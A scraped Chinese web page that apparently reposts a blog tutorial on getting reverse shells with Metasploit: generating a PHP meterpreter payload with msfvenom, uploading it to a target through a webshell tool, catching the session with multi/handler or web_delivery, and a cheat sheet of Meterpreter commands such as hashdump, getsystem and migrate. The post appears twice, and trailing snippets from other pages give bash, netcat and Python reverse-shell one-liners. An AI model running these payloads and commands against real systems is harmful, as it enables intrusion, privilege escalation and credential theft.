精华内容
下载资源
问答
  • msf反弹shell

    千次阅读 2019-05-15 16:02:00
    今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗ 反弹shell的两种方法 第一种Msfvenom实例: 1、msfconsole #启动msf 2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<...

    今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗

     

    反弹shell的两种方法

     

     第一种Msfvenom实例:

    1、msfconsole    #启动msf

    2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php    #生成反弹shell文件

    LHOST表示本地攻击机的ip, LPORT表示本地攻击机的端口。

    其他msf下的各种生成payload命令可参考https://www.cnblogs.com/backlion/p/6000544.html

    这样我们就成功生成了一个shell.php文件。

    3、接下来我们需要在本机中监听4444端口。

    这就表示开始本机开始监听4444端口了。

    4、现在把shell.php文件通过菜刀上传至目标服务器中,然后本地游览器访问shell.php

     即可以看见成功返回了一个session

    sessions -i     #查看当前可用会话

     

     第二种web_delivery实例流程:

     1、msfconsole    #启动msf

    2、show options    #目的是看exploit target为什么脚本

    这里默认为pyhton,需要更改为php

    show payloads    #挑选payload,选择php/meterpreter/reverse_tcp

    然后设置lhost

    得到一段脚本,将这段脚本在目标机的powershell中执行即可反弹shell。

     

    下面贴一些常用的命令:

    基础命令:
    seach cve-2017-7494                            #查看是否存在指定漏洞
    use exploit/multi/handler                        #使用exploit/multi/handler模块
    info                                                         #查看信息
    show options                  #查看exp的参数  rhost 是远程主机地址  lhost是本地主机地址
    back                                                       #返回上一级
    session -i                                                #查看当前可用会话
    sessions -i x                                           #切换至会话x
    session -k                                               #杀死所有活跃会话
    background                                            #将会话放到后台
    route                     #查看被控主机路由表
    sysinfo                       #查看系统信息
    run post/windows/gather/checkvm         #检查是否在虚拟机上运行
    idletime                    #查看运行时间
    getuid                                              #获得运行Meterpreter会话的用户名,从而查看当前会话具有的权限
    getsystem                                         #通过各种攻击向量来提升到系统用户权限
    getwd pwd                                        #shell处于靶机的目录
    getlwd                                               #本地的目录位置
    hashdump                                         #导出目标主机中的口令哈希值
    screenshot                                       #对目标主机的屏幕进行截图
    backgroud                                        #将当前Meterpreter shell转为后台执行
    quit                                                  #关闭当前Meterpreter会话,返回MSF终端    
    ps                                                       #显示所有运行进程以及管联的用户账户
    migrate PID                                      #迁移到一个指定的进程PID
    post/windows/manage/migrate                                  #会自动寻找合适的进程进行迁移
    execute -f cmd.exe -i                       #执行cmd.exe命令并进行交互
    shell                                                    #以所有可用令牌来运行一个交互的shell

    转载于:https://www.cnblogs.com/HKCZ/p/10870029.html

    展开全文
  • 今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗反弹shell的两种方法 第一种Msfvenom实例:1、msfconsole #启动msf2、msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > ...

    今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗

    反弹shell的两种方法

    b0bca5895e842b0d84ef5e464a78e2a6.png

    第一种Msfvenom实例:

    1、msfconsole    #启动msf

    2、msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php    #生成反弹shell文件

    LHOST表示本地攻击机的ip,LPORT表示本地攻击机的端口。

    cec0a22faf3b509270f449fcc535adef.png

    这样我们就成功生成了一个shell.php文件。

    3、接下来我们需要在本机中监听4444端口。

    086bc6b35835eebcd2b2b9418feba22c.png

    bc790e20b40ac5207abc8b6ae288984a.png

    6c661c9f78c72fb1776c78aa217acc1b.png

    这就表示开始本机开始监听4444端口了。

    4、现在把shell.php文件通过菜刀上传至目标服务器中,然后本地游览器访问shell.php

    5dc15bf5fb2a8442ba3b990122463fed.png

    即可以看见成功返回了一个session

    c413bc9d885a55df86c9cef2a5f0da71.png

    sessions -i     #查看当前可用会话

    f69ef18e3721dc9c65cf56925c572fbf.png

    48372f9b260808557dc5aa3b932720fa.png

    第二种web_delivery实例流程:

    1、msfconsole    #启动msf

    6b20f0fccb2778c15fb27c6ac2df35c7.png

    2、show options    #目的是看exploit target为什么脚本

    这里默认为pyhton,需要更改为php

    9bc05a2ccded79e96d91bf2b0272116c.png

    1f6d33f03d43e6725c3bc0a02cbd4b1a.png

    show payloads    #挑选payload,选择php/meterpreter/reverse_tcp

    d41bf1f318a7c1ee79530cd67c753e9f.png

    然后设置lhost

    96df0f7c81e414affce7f15026d5fdf7.png

    f18878696ef7038be319657d0ee539ea.png

    得到一段脚本,将这段脚本在目标机的powershell中执行即可反弹shell。

    下面贴一些常用的命令:

    基础命令:

    seach cve-2017-7494                            #查看是否存在指定漏洞

    use exploit/multi/handler                        #使用exploit/multi/handler模块

    info                                                         #查看信息

    show options                  #查看exp的参数  rhost 是远程主机地址  lhost是本地主机地址

    back                                                       #返回上一级

    session -i                                                #查看当前可用会话

    sessions -i x                                           #切换至会话x

    session -k                                               #杀死所有活跃会话

    background                                            #将会话放到后台

    route                     #查看被控主机路由表

    sysinfo                       #查看系统信息

    run post/windows/gather/checkvm         #检查是否在虚拟机上运行

    idletime                    #查看运行时间

    getuid                                              #获得运行Meterpreter会话的用户名,从而查看当前会话具有的权限

    getsystem                                         #通过各种攻击向量来提升到系统用户权限

    getwd pwd                                        #shell处于靶机的目录

    getlwd                                               #本地的目录位置

    hashdump                                         #导出目标主机中的口令哈希值

    screenshot                                       #对目标主机的屏幕进行截图

    backgroud                                        #将当前Meterpreter shell转为后台执行

    quit                                                  #关闭当前Meterpreter会话,返回MSF终端

    ps                                                       #显示所有运行进程以及管联的用户账户

    migrate PID                                      #迁移到一个指定的进程PID

    post/windows/manage/migrate                                  #会自动寻找合适的进程进行迁移

    execute -f cmd.exe -i                       #执行cmd.exe命令并进行交互

    shell                                                    #以所有可用令牌来运行一个交互的shell

    展开全文
  • iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
  • vps+nps+msf反弹shell小技巧环境:vpsnps配置msf1配置msf2配置 有时候我们在做实验或者真实环境测试的时候存在漏洞的服务器在外网,而我们的攻击机kali在内网,在需要msf接收shell的时候不知道该怎么接收,也接收不...

    云服务器+nps+msf反弹shell小技巧

    有时候我们在做实验或者真实环境测试的时候存在漏洞的服务器在外网,而我们的攻击机kali在内网,在需要msf接收shell的时候不知道该怎么接收,也接收不了(外网ip->内网ip,是不可能找得到的)。此时我们就需要一个云服务器(有外网IP的云主机)再安装一个nps(内网穿透的软件,github上面有,安装教程也在github上面,安装完毕后nps的目录在/etc/nps)。然后具体操作如下

    环境:

    云服务器:123.57.x.x:8086

    靶机:64.69.43.237:10627(为vulnhub 的DC1,DC1我之间的文章有)

    攻击机:192.168.x.128

    云服务器

    在云服务器安装好nps

    nps配置

    在这里插入图片描述
    设置云服务器和kali的内网映射

    msf1配置

    在这里插入图片描述
    目标为靶机,监听为云服务器的外网映射IP和端口

    msf2配置

    在这里插入图片描述
    另起一个msf用于接收云服务器外网映射过来的shell,payload要一致,先run msf2再run msf1,成功从外网拿到shell

    在这里插入图片描述

    ps:

    个人站点博客:XingHe,欢迎来踩~

    展开全文
  • TomcatCVE-2020-10487任意命令执行(msf反弹shell) 漏洞原理:传送门 Ghostcat本身是一个Local File Include/Read(本地文件包含/读)漏洞,而非任意文件上传/写漏洞。在Apache Tomcat的安全公告页中,Ghostcat被...

    TomcatCVE-2020-10487任意命令执行(msf反弹shell)



    漏洞原理:传送门

    Ghostcat本身是一个Local File Include/Read(本地文件包含/读)漏洞,而非任意文件上传/写漏洞。在Apache Tomcat的安全公告页中,Ghostcat被描述为“AJP Request Injection and potential Remote Code Execution”(AJP请求注入和潜在的远程代码执行)漏洞。Potential表明Ghostcat默认情况下并非RCE漏洞。

    公告中进一步描述了RCE发生所需要的条件:web应用需要允许文件上传和允许将上传的文件存储到web应用中,或者攻击者可以获取web应用内容的控制权。融合了将文件看作JSP处理的场景可以实现RCE。

    实验环境

    主机 角色 IP
    centos8 漏洞靶机 192.168.1.80
    kali msf生成木马并接收shell 192.168.1.128
    windows10 攻击主机(执行poc) 192.168.1.120

    实验准备

    POC地址:传送门

    开启centos8主机,部署漏洞环境:

    # 进入vulhub目录
    cd /usr/sbin/vulhub/tomcat/CVE-2020-1938/
    # 创建镜像
    docker-compose build
    # 启动镜像
    docker-compose up -d
    # 进入镜像
    docker exec -it 镜像ID /bin/bash
    

    尝试访问漏洞页面:

    image-20210514200145023

    漏洞环境搭建成功!


    实验流程

    开启kali主机,利用msfvenom生成jsp木马:

    LHOST为kali的IP(也就是接收shell的主机)

    LPORT为监听端口(也是木马的连接端口)

    shell.txt为木马文件

    如图所示,shell.txt木马文件生成完毕。

    将shell.txt下载下来并传到漏洞靶机centos8中:

    image-20210514193218511

    将传到centos8的木马文件shell.txt复制到docker容器中:

    image-20210514193428470

    尝试访问木马文件:

    image-20210514193518911

    如图所示,可以访问到木马文件,说明文件上传成功。

    回到kali,打开msfconsole工具:

    image-20210514192628426

    开启一个本地监听,等待shell反弹:

    image-20210514192701457

    在windows主机上执行POC:

    image-20210514192540622

    回到kali的msf:

    image-20210514192813023

    发现shell成功反弹!

    展开全文
  • msf反弹shell内网渗透

    千次阅读 2019-10-16 11:20:50
    windows/x64/shell_reverse_tcp windows/x64/shell_bind_tcp 0x04 设置参数运行 set ..... run 0x05 添加路由 route add <目标IP> <目标子网掩码> 示例:route add 10.0.0.1 255.0.0.0 1 /...
  • 后渗透——利用kali工具MSF反弹shell

    千次阅读 2020-03-16 19:42:57
    msfconsole可能是Metasploit框架(MSF)最流行的接口。它提供了一个“一体化”的集中控制台,并允许您高效地访问MSF中几乎所有可用的选项。MSFconsole一开始可能看起来有些吓人,但是一旦您了解了命令的语法,您就会...
  • 1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&12.nc反弹nc -e /bin/sh 192.168.2.130 44443.pythonimport socket,subprocess,oss =socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect...
  • 运行环境:kali ip:192.168.123.90Linux ip:192.168.123.5Linux服务器上开有80端口,并且...然后打开kali 并启动msf进入> use exploit/multi/handler设置 payload> set payload php/metrpreter/reverse_tcp...
  • Liunx下能够构造shell反弹脚本有很多常见的如bash,netcat、socat以及各种语言,当然今天主要内容是详细介绍msfvenom如何生成shell脚本。正文metasploit-framework介绍Metasploit项目是一个旨在提供安全漏洞信息...
  • msfpayload反弹shell

    2019-09-28 20:18:16
    情景就是当我们获得webshell时,我们想留下我们的后门,这个时候我们可以用到msfpayload与msfconsole结合使用 启动PostgreSQL服务:service postgresql start 启动metasploit服务:service metasploit start ...
  • 使用msf进行反弹shell+内网渗透

    万次阅读 2018-12-30 18:50:38
    反弹shell的原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。 一、反弹shell: 1.首先使用msf中的...
  • 感谢: ...MSF: msf > use payload/php/bind_phpmsf exploit(handler) > set PAYLOAD payload/php/bind_phpmsf exploit(handler) > set RHOST 目标内网ipmsf payload(bind_php) > gen...
  • 使用MSF反向反弹shell

    2020-07-20 19:06:51
    实验准备: 攻击(攻击者)主机: ... 反向反弹: 【步骤一】:msfconsole启动,结果如【图1】所示: 【命令】 msfconsole 一、msfconsole(这种没有启用数据库,搜索某些东西会很慢) 二、数据...
  • msfpayload反弹shell使用的一些命令集 &nbsp; &nbsp; &nbsp; 一、核心命令 – 帮助菜单 background – 将当前会话移动到背景变成一个session,当再次使用时再用sessions -i ID调用 bgkill – 杀死一个...
  • Linux/Windows反弹shell

    2021-05-28 08:11:34
    目录食用 ...使用MSF反弹shell Linux反弹shell 攻击机:192.168.41.142 靶机:192.168.41.138 bash反弹 Linux 反弹 shell 使用下面这条命令,该命令弹回来的shell是不可交互的,也就是比如vim...
  • msf web脚本反弹shell

    2018-06-09 00:25:00
    msf>msfpayloadphp/reverse_phpLHOST=x.x.x.xLPORT=2333R>re.php msf>usemulti/handler msfexploit(handler)>setPAYLOADphp/reverse_php msfexploit(handler)>setLHOST...
  • 冰蝎下反弹shellMSF

    千次阅读 2021-04-15 21:43:50
    我们利用冰蝎获取到了一个shell,那接下来要反弹shell到VPS(阿里云)中的MSF,方便进行后渗透。 1. 如下,获取到了shell 2. 选择反弹shell 如下填写vps的ip,和监听的端口。下面有提示使用的payload我们将其填...
  • MSF 生成shell命令

    2019-10-07 10:54:48
    MSF 生成在 Linux 下反弹的 Meterpreter Shell msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell MSF 生成反弹 Shell (C ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 2,715
精华内容 1,086
关键字:

msf反弹shell